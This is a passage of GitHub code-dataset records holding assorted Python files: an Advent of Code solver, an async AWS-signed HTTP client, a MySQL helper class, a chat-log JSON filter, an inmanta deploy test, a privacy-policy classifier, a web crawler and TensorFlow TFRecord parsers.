list_of_bags):\n super_bags = []\n for rule in rules:\n target_bag, contents = [el.replace(\"bags\", \"\").strip() for el in rule.split(\"contain\")]\n if any([bag in contents for bag in list_of_bags]):\n super_bags.append(target_bag)\n return super_bags\n\n\ndef d7_p1(rules: List[str]) -> int:\n list_of_bags = [\"shiny gold\"]\n total_bags = [\"shiny gold\"]\n while list_of_bags:\n list_of_bags = bag_contents(rules, list_of_bags)\n if list_of_bags:\n total_bags.extend(list_of_bags)\n\n return len(set(total_bags)) - 1\n\n\ndef organize_bag_items(list_bags: List[str]) -> Dict[str, Dict[str, int]]:\n item_bags = {}\n for bag in list_bags:\n main_bag, contents = [el.replace(\"bags\", \"\").replace(\"bag\", \"\").strip() for el in bag[:-1].split(\"contain\")]\n if \"no other\" in contents:\n items = {}\n else:\n item_list = [el.strip() for el in contents.split(\",\")]\n items = {\" \".join(item.split()[1:]): int(item.split()[0]) for item in item_list}\n item_bags[main_bag] = items\n return item_bags\n\n\ndef pick_bags(items: Dict[str, Dict[str, int]], query: str) -> int:\n if not items[query]:\n return 0\n else:\n return sum(list(items[query].values()) + [v * pick_bags(items, k) for k, v in items[query].items()])\n\n\ndef d7_p2(rules: List[str]) -> int:\n item_bags = organize_bag_items(rules)\n total_bags = pick_bags(item_bags, \"shiny gold\")\n return total_bags\n\n\ndef day_7() -> None:\n logger.info(\"Day 7: Handy Haversacks\")\n rules = load_day_7()\n t1 = time.time()\n n_bags = d7_p1(rules)\n logger.info(f\"N° of bag colors: {n_bags}\")\n t2 = time.time()\n logger.info(f\"Task 1 completed in {t2 - t1} seconds\")\n n_bags_2 = d7_p2(rules)\n logger.info(f\"N° of bag colors (update): {n_bags_2}\")\n t3 = time.time()\n logger.info(f\"Task 2 completed in {t3 - t2} seconds\")\n","repo_name":"sboomi/advent-of-code","sub_path":"code/2020/python/src/day_7.py","file_name":"day_7.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21088927087","text":"from http import HTTPStatus\nfrom 
typing import (\n Any,\n AsyncGenerator,\n Generator,\n Literal,\n Mapping,\n Optional,\n Sequence,\n TypeVar,\n Union,\n overload,\n)\n\nimport aiohttp\nfrom gyver.attrs import define\nfrom gyver.context import AsyncAdapter\nfrom gyver.url import URL\nfrom gyver.utils import lazyfield\n\nfrom gyver.aws.auth import AwsAuthV4\nfrom gyver.aws.credentials import Credentials\nfrom gyver.aws.exc import InvalidParam\nfrom gyver.aws.http.opts import Opts\nfrom gyver.aws.http.response import ResponseProxy\nfrom gyver.aws.typedef import GET, HEAD, POST, PUT, Services\n\nT = TypeVar(\"T\")\n\n\n@define(pydantic=False)\nclass AsyncAuthHttpClient:\n credentials: Credentials\n service: Services\n use_default_headers: bool = True\n verify_ssl: bool = True\n\n @lazyfield\n def aws_auth(self):\n return AwsAuthV4(\n self.credentials, self.service, self.use_default_headers\n )\n\n @lazyfield\n def session(self) -> aiohttp.ClientSession:\n session = aiohttp.ClientSession()\n session.verify = self.verify_ssl\n return session\n\n @property\n def is_closed(self):\n return self.session.closed\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, *_):\n await self.close()\n\n async def close(self):\n await self.session.close()\n\n async def do(self, opts: Opts[T]) -> T:\n response: aiohttp.ClientResponse = await self._methods[opts.method](\n self, **opts.kwargs()\n )\n return opts.response_handler(\n ResponseProxy(\n opts.url,\n headers=response.headers,\n status_code=HTTPStatus(response.status),\n content=await response.read(),\n )\n )\n\n async def iter(\n self, opt_generator: Generator[Opts[T], None, None]\n ) -> AsyncGenerator[T, None]:\n for item in opt_generator:\n yield await self.do(item)\n\n async def exhaust(\n self, opt_generator: Generator[Opts[T], None, None]\n ) -> Sequence[T]:\n return [await self.do(item) for item in opt_generator]\n\n async def exhaust_with_null(\n self, opt_generator: Generator[Opts, None, None]\n ) -> None:\n await self.exhaust(opt_generator)\n\n async def head(\n self,\n url: URL,\n headers: Optional[Mapping[str, str]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n headers = (\n headers\n if raw\n else self.aws_auth.headers(HEAD, url, headers=headers)\n )\n return await self.session.head(url.encode(), headers=headers)\n\n async def get(\n self,\n url: URL,\n headers: Optional[Mapping[str, str]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n headers = (\n headers\n if raw\n else self.aws_auth.headers(GET, url, headers=headers)\n )\n return await self.session.get(url.encode(), headers=headers)\n\n @overload\n async def post(\n self,\n url: URL,\n data: bytes = b\"\",\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n raw: bool = False,\n ) -> aiohttp.ClientResponse:\n ...\n\n @overload\n async def post(\n self,\n url: URL,\n data: Mapping[str, Any],\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n *,\n raw: Literal[True],\n ) -> aiohttp.ClientResponse:\n ...\n\n async def post(\n self,\n url: URL,\n data: Union[bytes, Mapping[str, Any]] = b\"\",\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n if not raw:\n if not isinstance(data, bytes):\n raise InvalidParam(\n \"data\", data, \"Requests using data as mapping must be raw\"\n )\n headers = self.aws_auth.headers(\n POST, url, headers=headers, data=data\n )\n if files:\n if isinstance(data, 
bytes):\n raise InvalidParam(\n \"data\",\n data,\n \"Requests using files must have mapping as files\",\n )\n data = {**data, **files}\n return await self.session.post(\n url.encode(), data=data, headers=headers\n )\n\n async def put(\n self,\n url: URL,\n data: Union[bytes, Mapping[str, Any]] = b\"\",\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n if not raw:\n if not isinstance(data, bytes):\n raise InvalidParam(\n \"data\", data, \"Requests using data as mapping must be raw\"\n )\n headers = self.aws_auth.headers(\n PUT, url, headers=headers, data=data\n )\n if files:\n if isinstance(data, bytes):\n raise InvalidParam(\n \"data\",\n data,\n \"Requests using files must have mapping as files\",\n )\n data = {**data, **files}\n return await self.session.put(\n url.encode(), data=data, headers=headers\n )\n\n _methods = {\n GET: get,\n POST: post,\n PUT: put,\n HEAD: head,\n }\n\n\n@define(pydantic=False)\nclass AsyncAuthHttpAdapter(AsyncAdapter[AsyncAuthHttpClient]):\n credentials: Credentials\n service: Services\n use_default_headers: bool = True\n verify_ssl: bool = True\n\n async def is_closed(self, client: AsyncAuthHttpClient) -> bool:\n return client.is_closed\n\n async def release(self, client: AsyncAuthHttpClient) -> None:\n await client.close()\n\n async def new(self):\n return AsyncAuthHttpClient(\n self.credentials,\n self.service,\n self.use_default_headers,\n self.verify_ssl,\n )\n","repo_name":"guscardvs/gyver-aws","sub_path":"gyver/aws/http/asyncio.py","file_name":"asyncio.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"36889118039","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport copy\nimport MySQLdb\nimport MySQLdb.cursors\nfrom datetime import datetime\n\n\nclass Dmysql:\n def __init__(self, host: str, user: str, passwd: str, db: str, port: int = 3306, keep_connect: bool = False):\n self.host, self.port = host, port\n self.user, self.passwd, self.db = user, passwd, db\n self.query, self.__conn, self.keep_connect = '', None, keep_connect\n self.err, self.err_msg, self.allow_log = 0, None, False\n\n def connecting(self, db=None):\n if not db:\n db = self.db\n # print('MYSQL CONNECTION', db)\n return MySQLdb.connect(host=self.host, user=self.user, passwd=self.passwd, db=db, port=self.port,\n charset='utf8', cursorclass=MySQLdb.cursors.DictCursor)\n\n def connect(self):\n if not self.__conn:\n self.__conn = self.connecting()\n self._log_file('connection open')\n return self.__conn\n\n def close(self):\n if not self.keep_connect and self.__conn:\n self.__conn.close()\n self._log_file('connection close')\n self.__conn = None\n\n def query_scalar(self, query: str, data: dict = None, close: bool = True):\n result, rs = None, self.query_row(query, data, close=close)\n if rs and self.err == 0:\n rs2 = list(rs.values())\n if rs2:\n result = rs2[0]\n return result\n\n def query_row(self, query: str, data: dict = None, close: bool = True) -> dict:\n result, rs = None, self.execute(query, data)\n if rs and self.err == 0:\n result = rs.fetchone()\n if close:\n self.close()\n return result\n\n __OPERATORS = {'$eq': '=', '$gt': '>', '$gte': '>=', '$lt': '<', '$lte': '<=', '$ne': '<>'}\n\n # '$in': ' IN','$nin': ' NOT IN','$and': ' AND ', '$or': ' OR ', '$not': ' NOT ', '$nor': ' NOR'}\n\n def __dict2keys(self, data: dict) -> list:\n result = []\n for k, v in 
data.items():\n _operator = '='\n if isinstance(v, dict):\n for _k, _v in v.items():\n if _k in self.__OPERATORS:\n _operator = self.__OPERATORS[_k]\n result.append('%s%s%s' % (self.__prefix_field(k), _operator, self._dict_value(k)))\n return result\n\n def _qargs(self, qry: str, data: dict) -> str:\n for k, v in data.items():\n qry = re.sub(r':%s(\\s+|\\)|$|;|:|,|\\+|-|\\*|/)' % k, r'%s\\1' % self._dict_value(k), qry)\n # print('qry=', qry)\n return qry\n\n def chk_has(self, table: str, where: dict = None, close: bool = True, query: str = None) -> bool:\n if not query:\n where_query = ''\n if where:\n where_query = ' WHERE %s' % ' AND '.join(self.__dict2keys(where))\n query = 'SELECT 1 FROM %s%s' % (table, where_query)\n nquery = 'SELECT EXISTS(%s) AS has;' % query\n result = self.query_scalar(nquery, data=where, close=close)\n if result:\n return result > 0\n return False\n\n def query_table(self, query: str, data: dict = None, close: bool = True) -> list:\n result, rs = None, self.execute(query, data)\n if rs and self.err == 0:\n result = rs.fetchall()\n if close:\n self.close()\n return result\n\n @staticmethod\n def _dict_value(key):\n return '%(' + str(key) + ')s'\n\n def shell_exec(self, command: str):\n return os.system(\"mysql -u%s -p'%s' %s\" % (self.user, self.passwd, command))\n # _args = ['mysql', 'u%s' + self.user, 'p%s' + self.passwd, command]\n # return subprocess.Popen(_args, stdout=subprocess.PIPE).communicate()\n\n def database_create(self, dbname: str = None):\n if not dbname:\n dbname = self.db\n self.shell_exec('-e \"CREATE DATABASE IF NOT EXISTS %s;\"' % dbname)\n\n def database_exists(self, dbname: str):\n cur = self.connecting('INFORMATION_SCHEMA').cursor()\n return cur.execute(\"SELECT SCHEMA_NAME FROM SCHEMATA WHERE SCHEMA_NAME=\\'%s\\';\" % dbname) == 1\n\n def insert(self, table: str, data: dict, commit: bool = True, close: bool = True) -> int:\n fields = [self.__prefix_field(k) for k in data.keys()]\n query = 'INSERT INTO %s (%s) VALUES (%s);' % (\n table, ','.join(fields), ','.join(map(self._dict_value, data)))\n result, rs = -1, self.execute(query, data, commit=commit, regquery=False)\n if rs and self.err == 0:\n result = rs.lastrowid\n if close:\n self.close()\n return result\n\n @staticmethod\n def __prefix_field(field: str) -> str:\n return '`%s`' % field\n\n def _where4update(self, table: str, data: dict, where: dict = None):\n if data and isinstance(data, dict):\n # sets = ['%s=%s' % (self.__prefix_field(k), self._dict_value(k)) for k, v in data.items()]\n _qry = 'UPDATE %s SET %s' % (table, ','.join(self.__dict2keys(data)))\n if where:\n _dt, wheres = copy.copy(data), []\n for k, v in where.items():\n dk = k\n if k in _dt.keys():\n dk += 'dragonupdate'\n _dt[dk] = v\n wheres.append('%s=%s' % (self.__prefix_field(k), self._dict_value(dk)))\n return _qry + ' WHERE %s;' % ' AND '.join(wheres), _dt\n return _qry + ';', data\n\n def update(self, table: str = None, data: dict = None, where: dict = None, commit: bool = True, close: bool = True, query: str = None) -> int:\n result = -1\n if not query:\n query, _data = self._where4update(table, data, where=where)\n rs = self.execute(query, _data, commit=commit, regquery=False)\n else:\n rs = self.execute(query, data, commit=commit, regquery=True)\n if rs and self.err == 0:\n result = rs.rowcount\n if close:\n self.close()\n return result\n\n def delete(self, table: str = None, where: dict = None, commit: bool = True, close: bool = True, query: str = None) -> int:\n result = -1\n if not query:\n query = 'DELETE 
FROM %s' % table\n            if where:\n                # wheres = ['%s=%s' % (self.__prefix_field(k), self._dict_value(k)) for k, v in where.items()]\n                query += ' WHERE %s;' % ' AND '.join(self.__dict2keys(where))\n            rs = self.execute(query, where, commit=commit, regquery=False)\n        else:\n            rs = self.execute(query, where, commit=commit, regquery=True)\n        if rs and self.err == 0:\n            result = 1\n        if close:\n            self.close()\n        return result\n\n    def _log_file(self, message: str, data: dict = None):\n        if self.allow_log:\n            tnow = datetime.now()\n            qfile = tnow.strftime('%m_%d_%H')\n            import json\n            with open('/home/dll/mysql/%s_%s.sql' % (self.db, qfile), 'a') as cw:\n                cw.write('\\n/*%s*/\\t%s\\n' % (tnow.strftime('%H:%M:%S'), message))\n                if data:\n                    cw.write('%s\\n' % json.dumps(data))\n\n    def commit(self):\n        try:\n            self.connect().commit()\n            self.err = 0\n        except Exception as e:\n            self.err = 500\n            self.err_msg = str(e)\n            print('ERR SQL', self.err_msg)\n\n    def execute(self, query: str, data: dict = None, commit: bool = True, regquery: bool = True):\n        # print('execute query=', query)\n        # print('execute data=', data)\n        if not query:\n            self.err = 502\n            self.err_msg = 'query is empty'\n        else:\n            if data and regquery:\n                query = self._qargs(query, data)\n            self.query = query\n            try:\n                conn = self.connect()\n                csr = conn.cursor()\n                if data:\n                    for k, v in data.items():\n                        if isinstance(v, dict):\n                            for _k, _v in v.items():\n                                if _k in self.__OPERATORS:\n                                    data[k] = _v\n                # print('QRY=', self.query, data)\n                csr.execute(self.query, data)\n                if commit:\n                    conn.commit()\n                self.err = 0\n                self._log_file(self.query, data)\n                return csr\n            except Exception as e:\n                self.err = 500\n                self.err_msg = str(e)\n                print('ERR SQL', self.err_msg)\n                # print(self.query, data)\n\n    def __execute_table(self, query: str, close: bool = True) -> int:\n        result, rs = -1, self.execute(query)\n        if rs and self.err == 0:\n            result = 1\n        if close:\n            self.close()\n        return result\n\n    def truncate(self, table: str, close: bool = True) -> int:\n        return self.__execute_table('TRUNCATE TABLE %s;' % table, close)\n\n    def droptable(self, table: str, close: bool = True) -> int:\n        return self.__execute_table('DROP TABLE %s;' % table, close)\n","repo_name":"canhbx123/sola.api","sub_path":"common/dmysql.py","file_name":"dmysql.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"72829976908","text":"import json\nfrom datetime import datetime, timedelta\n\n\n# Read the existing json file\nwith open(\"./data_original.json\", 'r', encoding=\"utf-8\") as file:\n    data = json.load(file)\n\nchat_data = []\nactor_list = [\"박지후\", \"윤찬영\", \"조이현\", \"로몬\", \"유인수\", \"이유미\", \"임재혁\"]\n# Edit the data\nfor i in data:\n    for j in i:\n        user_id = j[\"user\"][\"id\"]\n        user_name = j[\"user\"][\"name\"]\n        if user_name not in actor_list: continue\n        text_id = j[\"id\"]\n        time = j[\"created_at\"]\n        b = datetime.strptime(time, '%Y-%m-%dT%H:%M:%S.%fZ')\n        b = b + timedelta(hours=9)\n        text = j[\"text\"]\n        chat_data.append((b.strftime(\"%Y-%m-%d %H:%M:%S\"), user_name, text))\n        print(j[\"text\"])\n\nprint(len(chat_data))\n\n\n# Overwrite the existing json file\nwith open(\"./actor.json\", 'w', encoding='utf-8') as file:\n    json.dump(chat_data, file, indent=\"\\t\", ensure_ascii=False)","repo_name":"Jeongsj/AllOfUsAreDead","sub_path":"asset/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"37197690801","text":"import logging\n\nfrom 
agent_server.conftest import _deploy_resources, get_agent\nfrom utils import get_resource, log_contains, log_doesnt_contain, retry_limited\n\n\nasync def test_deploy_trigger(\n server, client, clienthelper, resource_container, environment, caplog, no_agent_backoff, async_finalizer\n):\n \"\"\"\n Test deployment of empty model\n \"\"\"\n caplog.set_level(logging.INFO)\n\n agent = await get_agent(server, environment, \"agent1\", \"agent5\")\n async_finalizer(agent.stop)\n\n version = await clienthelper.get_version()\n\n resources = [\n get_resource(version, agent=\"agent1\"),\n get_resource(version, agent=\"agent2\"),\n get_resource(version, agent=\"agent3\"),\n ]\n\n await _deploy_resources(client, environment, resources, version, False)\n\n async def verify(result, a1=0, code=200, warnings=[\"Could not reach agents named [agent2,agent3]\"], agents=[\"agent1\"]):\n assert result.code == code\n\n def is_deployed():\n return resource_container.Provider.readcount(\"agent1\", \"key1\") == a1\n\n await retry_limited(is_deployed, 1)\n log_contains(caplog, \"agent\", logging.INFO, f\"Agent agent1 got a trigger to update in environment {environment}\")\n log_doesnt_contain(caplog, \"agent\", logging.INFO, f\"Agent agent5 got a trigger to update in environment {environment}\")\n\n assert result.result[\"agents\"] == agents\n if warnings:\n assert sorted(result.result[\"metadata\"][\"warnings\"]) == sorted(warnings)\n caplog.clear()\n\n async def verify_failed(result, code=400, message=\"\", warnings=[\"Could not reach agents named [agent2,agent3]\"]):\n assert result.code == code\n\n log_doesnt_contain(caplog, \"agent\", logging.INFO, \"got a trigger to update\")\n if warnings:\n assert sorted(result.result[\"metadata\"][\"warnings\"]) == sorted(warnings)\n assert result.result[\"message\"] == message\n caplog.clear()\n\n # normal\n result = await client.deploy(environment)\n await verify(result, a1=1)\n\n # only agent1\n result = await client.deploy(environment, agents=[\"agent1\"])\n await verify(result, a1=2, warnings=None)\n\n # only agent5 (not in model)\n result = await client.deploy(environment, agents=[\"agent5\"])\n await verify_failed(\n result, 404, \"No agent could be reached\", warnings=[f\"Model version {version} does not contain agents named [agent5]\"]\n )\n\n # only agent2 (not alive)\n result = await client.deploy(environment, agents=[\"agent2\"])\n await verify_failed(result, 404, \"No agent could be reached\", warnings=[\"Could not reach agents named [agent2]\"])\n\n # All of it\n result = await client.deploy(environment, agents=[\"agent1\", \"agent2\", \"agent5\"])\n await verify(\n result,\n a1=3,\n agents=[\"agent1\"],\n warnings=[\"Could not reach agents named [agent2]\", f\"Model version {version} does not contain agents named [agent5]\"],\n )\n","repo_name":"inmanta/inmanta-core","sub_path":"tests/agent_server/test_deploy_trigger.py","file_name":"test_deploy_trigger.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"82"} +{"seq_id":"72119951309","text":"\nimport os\n# from predict_content import pre_title\nfrom find_Title import findTitleLabel\nimport re\nimport joblib\nfrom bs4 import BeautifulSoup\nmark_txt = {'0':\"personal_information_type.txt\",'1':\"personal_information_type.txt\",'2':\"personal_information_type.txt\",\n '3':\"share_information.txt\",'4':\"protect_information.txt\",\n '5':\"advertising.txt\",'6':\"user_right.txt\",'7':\"special_group.txt\",\n 
'8':\"special_area.txt\",'9':\"update.txt\",'10':\"way_to_collect.txt\",\n '11':\"provider.txt\",'12':\"data_retention.txt\",'13':\"personal_information_type.txt\",'14':\"thrid_party.txt\",'15':\"personal_infoinformation_tyoe.txt\"}\nclf = joblib.load('bys_classifier.pkl')\ntf = joblib.load('bys_tf.pkl')\ndef pre_title(title_list):\n type = 0\n cookie = 0\n share = 0\n security = 0\n right = 0\n children = 0\n specialArea = 0\n update = 0\n how = 0\n provide = 0\n retention = 0\n useData = 0\n clean_title_list = []\n for title in title_list:\n if title.text != \"•\":\n clean_title_list.append(title)\n order = []\n for title in clean_title_list:\n title_Str = re.sub(r'\\s+', ' ', str(title))\n title_Str = re.sub(r'<[^<]+?>', '', title_Str).replace('\\n', '').strip()\n title_Str = title_Str.lower()\n if title is None:\n continue\n try:\n mark = clf.predict(tf.transform([title_Str]))\n # print(\"---------\")\n # print(title_Str)\n # print(mark)\n # print(\"---------\")\n if mark[0] == \"1\":\n if \"USE\" in title_Str or \"use\" in title_Str:\n how = 1\n type = 1\n elif mark[0] == \"2\":\n cookie = 1\n elif mark[0] == \"3\":\n share = 1\n elif mark[0] == \"4\":\n security = 1\n elif mark[0] == \"6\":\n right = 1\n elif mark[0] == \"7\":\n children = 1\n elif mark[0] == \"8\":\n specialArea = 1\n elif mark[0] == \"9\":\n update = 1\n elif mark[0] == \"10\":\n how = 1\n type = 1\n elif mark[0] == \"11\":\n provide = 1\n elif mark[0] == \"12\":\n retention = 1\n elif mark[0] == \"13\":\n useData = 1\n elif mark[0] == \"15\":\n how = 1\n type = 1\n except Exception as e:\n continue\n if mark[0] not in order:\n order.append(mark[0])\n\n return type , cookie , share , security , right , children , specialArea , update , how , provide , retention , useData, order\n\ndef list_files(directory):\n files = []\n for filename in os.listdir(directory):\n filepath = os.path.join(directory, filename)\n if os.path.isfile(filepath):\n files.append(filepath)\n return files\ndef all_process(path):\n try:\n soup = BeautifulSoup(open(path),features=\"html.parser\",)\n except Exception:\n print('Formatting issues')\n return 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\"N\",1, 0\n label = findTitleLabel(path)\n if label == \"TitleWrong\":\n print(\"TitleWrong\")\n return 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ,\"N\",0, 1\n title_list = soup.find_all(label)\n\n # print(title_list)\n type, cookie, share, security, right, children, specialArea, update, how, provide, retention, useData, order = pre_title(title_list)\n return type, cookie, share, security, right, children, specialArea, update, how, provide, retention, useData, order , 0, 0\n# print(all_process(\"./pp_example/69_Developer Privacy Policy.html\"))\n\nif __name__ == \"__main__\":\n folder_path = \"./pp_example/\"\n files_in_folder = list_files(folder_path)\n for file in files_in_folder:\n if file == \"./pp_example/.DS_Store\":\n continue\n print(\"----------------------------------------------------------------------------------\")\n print(all_process(file))\n print(file)\n\n","repo_name":"UQ-Trust-Lab/Quper","sub_path":"src/compliance_of_disclosure/compliance_of_disclosure.py","file_name":"compliance_of_disclosure.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20586768471","text":"\"\"\" TFRecords contain serialized examples. 
Parsers read in these parsed\n examples and return a decoded tf.Tensor.\n\"\"\"\n\nfrom typing import Tuple\n\nimport tensorflow as tf\n\n\ndef parse_image(serialized: tf.Tensor, channels: int = 3) -> tf.Tensor:\n \"\"\"Parse an image contained in 'serialized' under the key 'image/encoded'.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n channels: int, number of color channels in the returned image\n\n Returns:\n image: tf.Tensor with dtype tf.uint8 and shape [height, width, channels]\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized, features={\"image/encoded\": tf.io.FixedLenFeature((), tf.string)}\n )\n\n image = tf.image.decode_image(parsed_example[\"image/encoded\"], channels=channels)\n return image\n\n\ndef parse_detection(serialized: tf.Tensor) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor]:\n \"\"\"Parse bounding boxes and classes contained in 'serialized' under the\n key 'image/object/bbox/{xmin, xmax, ymin, ymax}' and\n 'image/object/class/{text, labels}' and returns a boundingbox and\n class Tensor.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n\n Returns:\n boundingboxes: tf.Tensor with dtype tf.int32 and shape [num_boxes, 4]\n classes: tf.Tensor with dtype tf.int32 and shape [num_boxes]\n texts: tf.Tensor with dtype tf.string and shape [num_boxes]\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized,\n features={\n \"image/object/bbox/ymin\": tf.io.VarLenFeature(tf.float32),\n \"image/object/bbox/xmin\": tf.io.VarLenFeature(tf.float32),\n \"image/object/bbox/ymax\": tf.io.VarLenFeature(tf.float32),\n \"image/object/bbox/xmax\": tf.io.VarLenFeature(tf.float32),\n \"image/object/class/text\": tf.io.VarLenFeature(tf.string),\n \"image/object/class/label\": tf.io.VarLenFeature(tf.int64),\n },\n )\n\n ymin = tf.sparse.to_dense(parsed_example[\"image/object/bbox/ymin\"])\n xmin = tf.sparse.to_dense(parsed_example[\"image/object/bbox/xmin\"])\n ymax = tf.sparse.to_dense(parsed_example[\"image/object/bbox/ymax\"])\n xmax = tf.sparse.to_dense(parsed_example[\"image/object/bbox/xmax\"])\n bboxes = tf.stack((ymin, xmin, ymax, xmax), axis=-1)\n\n text = tf.sparse.to_dense(\n parsed_example[\"image/object/class/text\"], default_value=\"\"\n )\n label = tf.sparse.to_dense(parsed_example[\"image/object/class/label\"])\n return bboxes, label, text\n\n\ndef parse_classification(serialized: tf.Tensor) -> tf.Tensor:\n \"\"\"Parse a classlabel contained in 'serialized' under the key\n 'image/class/label' and return it.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n Returns:\n class: tf.Tensor with dtype tf.int64 and shape []\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized, features={\"image/class/label\": tf.io.FixedLenFeature((), tf.int64)}\n )\n\n label = parsed_example[\"image/class/label\"]\n return label\n\n\ndef parse_probability(serialized: tf.Tensor) -> tf.Tensor:\n \"\"\"Parse probabilities contained in 'serialized' under the key\n 'image/class/prob' and returns them.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n Returns:\n probabilities: tf.Tensor with dtype tf.float and shape [num_classes]\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized,\n features={\n \"image/class/prob\": tf.io.VarLenFeature(tf.float32),\n },\n )\n\n probabilities = tf.sparse.to_dense(parsed_example[\"image/class/prob\"])\n return probabilities\n\n\ndef 
parse_segmentation(serialized: tf.Tensor) -> tf.Tensor:\n    \"\"\"Parse segmentation contained in 'serialized' under the key\n    'image/segmentation/class/encoded' and returns it.\n\n    Args:\n        serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n    Returns:\n        segmentation: tf.Tensor with dtype tf.int64 and shape [H, W, 1]\n    \"\"\"\n    key = \"image/segmentation/class/encoded\"\n    parsed_example = tf.io.parse_single_example(\n        serialized, features={key: tf.io.FixedLenFeature((), tf.string)}\n    )\n\n    segmentation = tf.image.decode_png(parsed_example[key])\n    return segmentation\n\n\ndef parse_instance_segmentation(serialized: tf.Tensor) -> tf.Tensor:\n    \"\"\"Parse segmentation contained in 'serialized' under the key\n    'image/object/mask' and returns it.\n\n    Args:\n        serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n    Returns:\n        instance_segmentations: tf.Tensor with dtype tf.int64 and shape [N, H, W, 1]\n    \"\"\"\n    key = \"image/object/mask\"\n    parsed_example = tf.io.parse_single_example(\n        serialized,\n        features={\n            key: tf.io.VarLenFeature(tf.string),\n        },\n    )\n\n    instance_segmentations = tf.map_fn(\n        tf.image.decode_png, parsed_example[key], dtype=tf.uint8\n    )\n    return instance_segmentations\n","repo_name":"adriankoering/tfrecord_io","sub_path":"tfrecord_io/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} {"seq_id":"35261552375","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\nimport os\nfrom logging import DEBUG, StreamHandler, getLogger\n\nimport lxml\nimport requests\nfrom bs4 import BeautifulSoup\n\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setFormatter(logging.Formatter('%(asctime)s: %(message)s', datefmt='%Y/%m/%d %H:%M:%S'))\nhandler.setLevel(DEBUG)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\nlogger.propagate = False\n\n\ndef main():\n    try:\n        parser = argparse.ArgumentParser(description='requests crawler for internal lecture')\n        parser.add_argument('-u', '--url', type=str, dest='url', required=True, help='URL of the web page to fetch and save as an HTML file.')\n        parser.add_argument('-f', '--filename', type=str, dest='file_name', required=True, help='filename of the output file fetched via requests')\n        args = parser.parse_args()\n\n        headers = {\n            'User-Agent': 'Mozilla / 5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 62.0.3202.89 Safari / 537.36'\n        }\n        res = requests.get(\"http://{}\".format(args.url), headers=headers)\n        logger.debug(\"accessed http://{}\".format(args.url))\n\n        if res.status_code == 200:\n            logger.debug(\"succeeded access.\")\n            file_name = \"{}/html/{}\".format(os.path.dirname(os.path.abspath(__file__)), args.file_name)\n            with open(file_name, \"w\") as f:\n                logger.debug(\"write html data to file.\")\n                f.write(str(BeautifulSoup(res.text, \"lxml\")))\n            logger.debug(\"finish write data.\")\n\n    except Exception as e:\n        logger.debug(e)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"kazu0716/scrayping-lecture","sub_path":"answer/request_crawler.py","file_name":"request_crawler.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} {"seq_id":"14425288504","text":"#Task 6 - Q15 : Linear Algebra\r\n\r\n\r\nimport numpy as np\r\n\r\nN = int(input())\r\n\r\nl = []\r\nfor i in range(N):\r\n    A = 
list(map(float,input().split()))\r\n    l.append(A)\r\n    \r\na = np.array(l)\r\n\r\nprint(round(np.linalg.det(a),2))\r\n","repo_name":"Bimal-101/Data_Science_Works","sub_path":"Innomatics/Assignment/Task 6/T6_Q15.py","file_name":"T6_Q15.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"35645391250","text":"master_input = []\nwith open(\"input/day2_input.txt\") as f:\n    for line in f:\n        l = line.strip()\n        # print(l)\n        master_input = [int(n) for n in l.split(',')]\n\ndef find_output(input):\n    command_index = 0\n\n    while input[command_index] != 99:\n\n        command = input[command_index]\n        val_one = input[input[command_index + 1]]\n        val_two = input[input[command_index + 2]]\n        save_to = input[command_index + 3]\n\n        # print('command_index: ' + str(command_index))\n        # print('command: ' + str(input[command_index]))\n        # print('val_one: ' + str(val_one))\n        # print('val_two: ' + str(val_two))\n        # print('save_to: ' + str(save_to))\n        if save_to >= len(master_input):\n            